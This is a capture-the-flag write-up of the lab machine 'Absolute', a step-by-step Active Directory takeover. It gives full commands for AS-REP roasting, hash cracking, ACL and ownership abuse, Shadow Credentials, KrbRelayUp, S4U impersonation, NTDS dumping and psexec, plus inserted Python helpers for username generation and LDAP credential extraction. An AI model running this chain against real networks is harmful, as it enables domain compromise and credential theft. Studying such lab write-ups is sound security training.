Absolute involved extracting usernames from the metadata of the images on the website, using Username Anarchy to generate candidate username formats, and using kerbrute to find which of them are valid domain users. One of them, d.klay, has Kerberos pre-authentication disabled, which allows AS-REP roasting. After cracking the hash, the credentials don't work over NTLM because NTLM authentication is disabled on the domain, but requesting a TGT with them gives us Kerberos access to LDAP, where svc_smb's password is stored in the user's description attribute. With svc_smb the Shared SMB share can be accessed; it contains compiler.sh and test.exe, and capturing the exe's traffic in Wireshark shows that it authenticates to LDAP with m.lovegod's credentials. With this account we can enumerate the domain with bloodhound.py, which shows a path to winrm_user: m.lovegod can take ownership of a group that has GenericWrite on winrm_user, and GenericWrite lets us perform the Shadow Credentials technique. With winrm_user we get a session through WinRM, and running winPEAS there reveals that the machine is vulnerable to KrbRelayUp, which gives us the administrator user.
NMAP
Nmap scan report for 10.10.11.181
Host is up (0.11s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-25 02:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
54894/tcp open msrpc Microsoft Windows RPC
PORT 445 (SMB)
Checking for anonymous SMB login, but it doesn't list any shares.
PORT 80 (HTTP)
The site only shows a static page with nothing to interact with, so I fuzzed for files and directories with gobuster.
Next, fuzzing for subdomains or vhosts with wfuzz.
This didn't find anything either. Going back to the site, there are some images that don't show anything meaningful on their own, but their EXIF data reveals usernames.
We can grab the names from all the images with an exiftool one-liner, taking the two words after the Author field:
exiftool *.jpg | grep Author | awk '{print $3,$4}'
We have names, but we still need to figure out which username format the domain uses, e.g. firstname.lastname, first-initial.lastname and so on. For that I used a tool called Username Anarchy:
username-anarchy -i ./names.txt -f firstlast,first.last
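As an added example (not the writeup's code, and not Username Anarchy itself), the following Python builds the same kind of candidate list from full names, covering the common Active Directory naming conventions, so the output can be fed straight to kerbrute. The names in it are constructed stand-ins for the Author fields, not the real names from the images.

```python
import re

# Common Active Directory username conventions, keyed by the same names
# Username Anarchy uses for its -f option (first.last, flast, ...).
FORMATS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "f.last":     lambda f, l: f"{f[0]}.{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "first.l":    lambda f, l: f"{f}.{l[0]}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "last.first": lambda f, l: f"{l}.{f}",
    "lfirst":     lambda f, l: f"{l[0]}{f}",
    "first":      lambda f, l: f,
}

def split_name(full_name):
    """Lowercase a 'First [Middle] Last' string and return (first, last),
    or None when there is only one token. Non-letters are stripped, since
    sAMAccountNames almost never carry accents or punctuation."""
    parts = re.sub(r"[^a-z\s]", "", full_name.lower()).split()
    if len(parts) < 2:
        return None
    return parts[0], parts[-1]

def candidates(full_names, formats=None):
    """Return a de-duplicated list of usernames, one per (name, format),
    in a stable order so the list is reproducible between runs."""
    chosen = formats or list(FORMATS)
    seen, out = set(), []
    for full_name in full_names:
        pair = split_name(full_name)
        if pair is None:
            continue
        first, last = pair
        for fmt in chosen:
            user = FORMATS[fmt](first, last)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out

# Constructed sample input standing in for the Author fields pulled out of
# the images; these are not the real names from the box.
SAMPLE_NAMES = ["Jane Doe", "John Ronald Smith", "madonna"]

if __name__ == "__main__":
    # One username per line is the input format kerbrute userenum expects.
    with open("generated_names.txt", "w") as fh:
        fh.write("\n".join(candidates(SAMPLE_NAMES)) + "\n")
    print(candidates(SAMPLE_NAMES, ["first.last", "f.last"]))
```

Every line in the output costs one AS-REQ against the KDC when kerbrute runs, so restrict the formats to the ones the domain plausibly uses instead of sending every permutation.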
Foothold (d.klay)
Now that we have candidate usernames, we can use kerbrute
to see which of them exist in the domain, assuming we generated the names in the right format:
kerbrute userenum ./generated_names.txt -d absolute.htb --dc 10.10.11.181
From the output we can see that kerbrute found d.klay
and that this account does not require pre-authentication, which makes it AS-REP roastable. Before cracking the hash: kerbrute requests AES (etype 18) and hashcat
doesn't support cracking AS-REP hashes of that etype, so we request the hash again with impacket's GetNPUsers, which asks for RC4 (etype 23), passing the username list with -usersfile:
python3 GetNPUsers.py absolute.htb/uwu@dc.absolute.htb -usersfile ./generated_names.txt -request
This hash can now be cracked with hashcat, mode 18200 (Kerberos 5 AS-REP etype 23):
hashcat -a 0 -m 18200 ./hash.txt /opt/SecLists/Passwords/rockyou.txt --force
I tried the credentials on RPC and SMB but got an account restriction error, and they didn't work on LDAP either. Password spraying showed that none of the valid usernames are allowed on SMB.
This suggests that NTLM authentication is disabled, so let's use Kerberos authentication instead. For that we need d.klay's TGT, which we can request with impacket's getTGT:
python3 getTGT.py absolute.htb/d.klay
Now, after exporting the ticket in KRB5CCNAME, we can use impacket's smbclient.py
with Kerberos authentication (-k -no-pass) to list shares:
python3 smbclient.py absolute.htb/d.klay@dc.absolute.htb -k -no-pass -debug
But it shows a clock skew error: Kerberos rejects requests whose timestamp is more than a few minutes off the KDC's clock, and the nmap scan already showed the DC is 7 hours ahead of us. So we need to synchronize our time with the domain controller:
sudo ntpdate 10.10.11.181
The only shares accessible to this user are NETLOGON
and SYSVOL,
which don't seem to have anything interesting. To log in through rpcclient
with Kerberos auth, set up /etc/krb5.conf:
[libdefaults]
    default_realm = ABSOLUTE.HTB

[realms]
    ABSOLUTE.HTB = {
        kdc = 10.10.11.181
    }
We can get more users through enumdomusers:
rpcclient -U absolute.htb/d.klay dc.absolute.htb -k
I checked whether any of the new users also had the pre-authentication flag unset.
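Added example, not part of the writeup: the check described above done in Python, decoding each account's userAccountControl to see whether DONT_REQ_PREAUTH is set on an enabled account. It parses a constructed ldapsearch-style LDIF sample (the DNs and flag values are made up for the example, not taken from the box) and also builds the LDAP filter that asks the DC for exactly those accounts, so the same check can be run server-side with ldapsearch or cme.

```python
# userAccountControl bit flags as documented in [MS-ADTS] / [MS-SAMR].
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000020: "PASSWD_NOTREQD",
    0x0000200: "NORMAL_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0100000: "NOT_DELEGATED",
    0x0400000: "DONT_REQ_PREAUTH",
    0x0800000: "PASSWORD_EXPIRED",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000
# OID of the LDAP_MATCHING_RULE_BIT_AND extensible match, used for bitwise filters.
BIT_AND = "1.2.840.113556.1.4.803"

def decode_uac(value):
    """Human-readable names of the flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def parse_ldif(text):
    """Pull (sAMAccountName, userAccountControl) pairs out of LDIF as printed
    by ldapsearch -LLL. Entries are separated by blank lines; base64 values
    ('attr:: ...') are not needed here and are left undecoded."""
    accounts, cur = [], {}
    for line in text.splitlines() + [""]:
        if not line.strip():
            if "sAMAccountName" in cur and "userAccountControl" in cur:
                accounts.append((cur["sAMAccountName"], int(cur["userAccountControl"])))
            cur = {}
        elif ": " in line and not line.startswith(" "):
            key, value = line.split(": ", 1)
            cur[key] = value
    return accounts

def asrep_roastable(accounts):
    """Accounts worth sending to GetNPUsers: pre-auth not required AND enabled.
    A disabled account never yields an AS-REP, so it is useless for roasting."""
    return [sam for sam, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]

def asrep_filter():
    """The same check as an LDAP filter, evaluated by the DC."""
    return (f"(&(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE})))")

# Constructed sample output; only d.klay should come out as roastable.
SAMPLE_LDIF = """\
dn: CN=d.klay,CN=Users,DC=absolute,DC=htb
sAMAccountName: d.klay
userAccountControl: 4194816

dn: CN=svc_smb,CN=Users,DC=absolute,DC=htb
sAMAccountName: svc_smb
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=absolute,DC=htb
sAMAccountName: Guest
userAccountControl: 66082

dn: CN=old.svc,CN=Users,DC=absolute,DC=htb
sAMAccountName: old.svc
userAccountControl: 4194818
"""

if __name__ == "__main__":
    for sam, uac in parse_ldif(SAMPLE_LDIF):
        print(f"{sam:10} {uac:#09x} {decode_uac(uac)}")
    print("roastable:", asrep_roastable(parse_ldif(SAMPLE_LDIF)))
    print("filter:   ", asrep_filter())
```

The filter string can be pasted into ldapsearch as-is; the client-side decode is the fallback when the account you are authenticated as can only read the attribute but the DC refuses extensible-match filters over the anonymous or restricted bind you have.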
Privilege Escalation (svc_smb)
Which wasn’t the case, I decided to go back and check ldap through kerberos auth and needed to update cme as it was giving an error on ldap
Now checking if we can access ldap
poetry run crackmapexec ldap 10.10.11.181 -k --kdcHost dc.absolute.htb --user
We have the password for the svc_smb
user, AbsoluteSMBService123!,
from its description. We need to generate a TGT again for this user to access SMB and see which shares we can access now.
Listing shares with cme, we can see that this user can access Shared.
In Shared there are two files.
From compile.sh
it seems that the exe is compiled from Nim.
Running the exe on a Windows machine, it doesn't show any output.
Adding the hostname to C:\Windows\System32\drivers\etc\hosts:
Privilege Escalation (m.lovegod)
After adding the hostname, running the exe again with Wireshark capturing shows that it tries to bind to LDAP with credentials sent in the clear.
Opening the packet, we get the password for m.lovegod,
which is AbsoluteLDAP2022!
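Added example, not part of the writeup: a minimal BER decoder for the LDAP BindRequest, which is the structure Wireshark is dissecting when it shows the password. The packet bytes are constructed here with the matching encoder rather than read from a capture, and the bind name form (user@domain) is an assumption about what the exe sends. A SASL bind is included to show that only a simple bind leaks the password like this; a Kerberos (GSS-SPNEGO) bind would not.

```python
# BER tags used by an LDAP BindRequest (RFC 4511 section 4.2, X.690 encoding).
TAG_SEQUENCE     = 0x30
TAG_INTEGER      = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60  # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE  = 0x80  # [0] simple: the password as a raw OCTET STRING
TAG_AUTH_SASL    = 0xA3  # [3] sasl: mechanism name plus credentials

def _encode_len(n):
    """BER length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, body):
    return bytes([tag]) + _encode_len(len(body)) + body

def build_simple_bind(msg_id, name, password):
    """LDAPMessage { messageID, BindRequest { version 3, name, simple password } }.
    msg_id is kept below 128 so it fits a single INTEGER byte."""
    bind = (_tlv(TAG_INTEGER, b"\x03") + _tlv(TAG_OCTET_STRING, name.encode())
            + _tlv(TAG_AUTH_SIMPLE, password.encode()))
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, bytes([msg_id])) + _tlv(TAG_BIND_REQUEST, bind))

def build_sasl_bind(msg_id, mechanism):
    """Same message shape with a SASL authentication choice and an empty name."""
    sasl = _tlv(TAG_OCTET_STRING, mechanism.encode())
    bind = (_tlv(TAG_INTEGER, b"\x03") + _tlv(TAG_OCTET_STRING, b"")
            + _tlv(TAG_AUTH_SASL, sasl))
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, bytes([msg_id])) + _tlv(TAG_BIND_REQUEST, bind))

def _read_tlv(buf, pos):
    """Return (tag, value, end_offset) for the BER element starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                      # long-form length
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:end], end

def extract_simple_bind(packet):
    """Return {'message_id', 'name', 'password'} for a simple BindRequest, else None."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != TAG_SEQUENCE:
        return None
    tag, msg_id, pos = _read_tlv(msg, 0)
    tag2, bind, _ = _read_tlv(msg, pos)
    if tag != TAG_INTEGER or tag2 != TAG_BIND_REQUEST:
        return None                       # not a BindRequest (search, unbind, ...)
    _, _version, pos = _read_tlv(bind, 0)
    _, name, pos = _read_tlv(bind, pos)
    tag, auth, _ = _read_tlv(bind, pos)
    if tag != TAG_AUTH_SIMPLE:            # SASL binds carry no cleartext password
        return None
    return {"message_id": int.from_bytes(msg_id, "big"),
            "name": name.decode(), "password": auth.decode()}

def find_simple_binds(stream):
    """Walk back-to-back LDAPMessages in a reassembled TCP payload and
    return every simple-bind credential found."""
    creds, pos = [], 0
    while pos < len(stream):
        _, _, end = _read_tlv(stream, pos)
        found = extract_simple_bind(stream[pos:end])
        if found:
            creds.append(found)
        pos = end
    return creds

# Constructed stand-in for what the exe puts on the wire: a SASL bind first,
# then the simple bind that actually leaks the password.
SAMPLE_STREAM = (build_sasl_bind(1, "GSS-SPNEGO")
                 + build_simple_bind(2, "m.lovegod@absolute.htb", "AbsoluteLDAP2022!"))

if __name__ == "__main__":
    print(find_simple_binds(SAMPLE_STREAM))
```

With a real capture, feed find_simple_binds the reassembled client-to-server TCP payload of the port 389 stream (Wireshark's "Follow TCP Stream" raw export works); if the exe had used LDAPS or a SASL bind, the same scan would turn up nothing, which is the fix a defender would apply.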
This user didn't give us any special access. JazzPizazz tweeted during the box release that he had modified bloodhound.py to work with Kerberos authentication:
python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -no-pass -c all -ns 10.10.11.181
This worked, and we have the domain data to import into BloodHound.
Checking which groups m.lovegod is a member of:
He is a member of three groups, of which Networkers
looks like a custom group. Enumerating that group,
it has WriteOwner
on the Network Audit
group, and looking further into that group, it has GenericWrite
on winrm_user.
So the path is: m.lovegod is in Networkers, which has WriteOwner on Network Audit, so we can make ourselves owner of that group, grant ourselves the right to add members, and add m.lovegod to Network Audit. That gives us the group's GenericWrite on winrm_user, with which we can add an SPN to winrm_user and Kerberoast it, a technique known as targeted Kerberoasting.
The problem is that we don't have a shell, and the usual tools for this are PowerView
or the AD module.
I tried powerview.py
and ldap_shell,
but they didn't work. ldapsearch
did, and it showed the msDS-KeyCredentialLink attribute, which can be abused as well:
ldapsearch -LLL -Y GSSAPI -H ldap://dc.absolute.htb -b "dc=absolute,dc=htb"
I saw a tweet from Shutdown
sharing branches of impacket with scripts for abusing WriteOwner and WriteDACL.
Digging further, I found a resource on abusing WriteOwner using the author's script.
These scripts aren't merged into the upstream impacket repo, so create a Python virtual environment and install that fork there so it doesn't interfere with the impacket already installed.
With the virtual environment created, clone the repo:
git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git
Copy owneredit.py
from the owneredit branch and install impacket.
Once it's installed, use owneredit
to make m.lovegod the owner of the Network Audit group:
python3 ./owneredit.py -action write -target 'NETWORK AUDIT' -new-owner 'm.lovegod' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
Privilege Escalation (winrm_user)
Now that m.lovegod owns the audit group, we can grant him full control over it, which includes adding members; once he is a member he gets the group's GenericWrite on winrm_user:
python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'm.lovegod' -target 'NETWORK AUDIT' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
All that is left is to add m.lovegod to the audit group with net rpc:
net rpc group addmem 'Network Audit' 'm.lovegod' -U absolute.htb/m.lovegod -S dc.absolute.htb -k
We need to request a fresh TGT, as group membership is carried in the ticket, and the box reverts these changes after a while.
With targeted Kerberoasting
we can add an SPN to winrm_user and request a TGS for it:
python3 ./targetedKerberoast.py -d absolute.htb -u m.lovegod --dc-ip 10.10.11.181 -k --no-pass -v
But this hash was not crackable. All of this can also be done from a Windows machine. First synchronize time with the DC using w32tm;
the service needs to be started first:
net start w32time
w32tm /config /manualpeerlist:dc.absolute.htb /syncfromflags:MANUAL /reliable:yes /update
With the time synchronized we can use PowerView,
but the hosts file and the OpenVPN adapter need some configuration first, otherwise it won't work properly and errors out. Build the credential object:
$SecPassword = ConvertTo-SecureString 'AbsoluteLDAP2022!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)
To make this work, add the domain controller's IP as the DNS server in the OpenVPN adapter's settings,
and make sure dc.absolute.htb isn't in the hosts file.
Now the PowerView commands work.
Since I was now on a Windows machine, and a day had passed since I made m.lovegod the owner of Network Audit from Linux, that change had most likely been reverted, so I redid it with PowerView:
Set-DomainObjectOwner -Credential $Cred -Identity "NETWORK AUDIT" -OwnerIdentity "m.lovegod" -Domain 'absolute.htb' -DomainController dc.absolute.htb -Verbose
Now giving him full control again:
Add-DomainObjectAcl -TargetIdentity "NETWORK AUDIT" -PrincipalIdentity m.lovegod -Rights All -Verbose -Credential $Cred -Domain 'absolute.htb'
Now adding m.lovegod to the Network Audit group so that we can abuse GenericWrite via targeted Kerberoasting:
Add-DomainGroupMember -Identity 'NETWORK AUDIT' -Members 'm.lovegod' -Domain 'absolute.htb' -Credential $Cred -Verbose
We can verify that m.lovegod was added to the group.
Setting the SPN on winrm_user then didn't work, probably because the cleanup script had already reverted things, though I'm not really sure why, as I was running the commands one after the other:
Set-DomainObject -Identity 'winrm_user' -Set @{serviceprincipalname='MSSQL/UwU'} -Domain 'absolute.htb' -DomainController dc.absolute.htb -Credential $Cred -Verbose
So what we can do is repeat the same process (make m.lovegod the owner of the audit group, grant full control, add m.lovegod to the group) and then request a TGT. The ticket keeps the group membership regardless of the configuration being reverted afterwards.
Checking if the ticket has been loaded
But targeted Kerberoasting wasn't the way. Since we have GenericWrite on winrm_user, we can write msDS-KeyCredentialLink,
which allows us to perform the Shadow Credentials technique with pywhisker:
python3 ./pywhisker.py -a add --dc-ip 10.10.11.181 -d absolute.htb -u 'm.lovegod' -k --no-pass -t winrm_user
Following PKINITtools, we can request a TGT with the generated certificate and then use it to recover the NT hash; this needs minikerberos
installed:
python3 ./gettgtpkinit.py -cert-pfx ../pywhisker/luUEOlxx.pfx -pfx-pass p9nq1oiCzfgRbOWKMZWQ absolute.htb/winrm_user winrm_user.ccache
Export the TGT by pointing KRB5CCNAME at winrm_user.ccache, then pass the AS-REP encryption key printed by gettgtpkinit to getnthash, which recovers the NT hash from the PAC:
python3 ./getnthash.py -key 1b9d937e95c70cc1dd37ad5c67be8d6ff7617fb8438d012236e0f4b3e1cb1e91 absolute.htb/winrm_user
This can also be done with Rubeus by transferring the pfx file and asking for a TGT; /getcredentials also returns the NT hash:
Rubeus.exe asktgt /user:winrm_user /certificate:luUEOlxx.pfx /password:p9nq1oiCzfgRbOWKMZWQ /domain:absolute.htb /domaincontroller:dc.absolute.htb /getcredentials /show
We can't do much with the NT hash since NTLM is disabled, but the TGT is useful: we can use it to authenticate to WinRM. For that I found a Ruby script that does WinRM over Kerberos.
After cloning the repo I ran into another problem:
winrm_kerb_shell.rb -s dc.absolute.htb -r ABSOLUTE.HTB
This can be resolved by following the forum post below, which says to add the domain name in capitals to the hosts file.
Now the script works perfectly.
After authenticating to the WinRM service, the service ticket for WinRM is saved in the cache, and we can use evil-winrm:
evil-winrm -i dc.absolute.htb -r ABSOLUTE.HTB
We can run winPEAS on the machine since Defender is disabled; it reports that the system is vulnerable to KrbRelayUp.
We can abuse this by following the post below. To compile KrbRelayUp we need Visual Studio; after compiling, transfer the executable to the target machine.
Following the blog post, we abuse shadow credentials through KrbRelayUp. It didn't work on the first run, so we probably need a different CLSID.
We can look up other CLSIDs here:
Privilege Escalation (Administrator)
This time we get an access denied, so the CLSID is correct but it isn't accessible from this user, and we probably need to run the exe as a different user such as m.lovegod. Running an exe as another user was a pain: I tried Invoke-Command and some Runas scripts, which didn't work, but RunasCs did:
RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb 'C:\Users\winrm_user\Documents\KrbRelayUp.exe full -m shadowcred --ForceShadowCred -cls 3c6859ce-230b-48a4-be6c-932c0c202048' -l 9
Now use Rubeus to get a TGT for the DC$
machine account with the generated certificate:
.\Rubeus.exe asktgt /user:DC$ /certificate:cert /password:password /enctype:AES256 /nowrap
With that ticket we can impersonate the administrator user via S4U2self, since DC$ is a service account that can request service tickets to itself on behalf of any user:
.\Rubeus.exe s4u /self /user:DC$ /impersonateuser:administrator /msdsspn:host/dc.absolute.htb /ticket:kirbi_ticket
Convert the administrator's .kirbi ticket to ccache so we can use it with the impacket scripts. First decode the base64 Rubeus printed:
echo "kirbiticket" | base64 -d > kirbiticket.kirbi
Then convert it to a ccache with ticketConverter:
ticketConverter.py kirbiticket.kirbi ticket.ccache
With the administrator's ticket we can dump the SAM and NTDS.dit hashes:
secretsdump.py absolute.htb/administrator@dc.absolute.htb -k -no-pass
And now we can use any of the impacket exec scripts; I used psexec
to get a shell:
psexec.py -k -no-pass absolute.htb/administrator@dc.absolute.htb
References
- https://github.com/urbanadventurer/username-anarchy
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://python-poetry.org/docs/#installing-with-the-official-installer
- https://wiki.porchetta.industries/getting-started/installation/installation-on-unix
- https://itnursery.com/ldapsearch-and-kerberos-authentication/
- https://twitter.com/PizazzJazz/status/1574360409846337537?t=uQ32qRfo2Cl5M5lCDJCGuA&s=19
- https://github.com/jazzpizazz/BloodHound.py-Kerberos
- https://www.thehacker.recipes/ad/movement/dacl/grant-rights
- https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
- https://twitter.com/_nwodtuhs/status/1525527323667218432?lang=en
- https://github.com/ShutdownRepo/impacket/tree/owneredit
- https://github.com/ShutdownRepo/impacket/tree/dacledit
- https://community.spiceworks.com/how_to/160048-work-with-ntp-via-powershell
- https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
- https://github.com/ShutdownRepo/pywhisker
- https://github.com/dirkjanm/PKINITtools
- https://github.com/skelsec/minikerberos
- https://github.com/confluentinc/librdkafka/issues/2117
- https://forum.hackthebox.com/t/simple-winrm-shell-via-kerberos/1870
- https://stackoverflow.com/questions/18760281/how-do-i-increase-the-scrollback-buffer-size-in-tmux
- https://github.com/DarkCoderSc/run-as
- https://notes.vulndev.io/notes/redteam/payloads/windows
- https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
- https://github.com/Dec0ne/KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
- https://github.com/antonioCoco/RunasCs
- https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/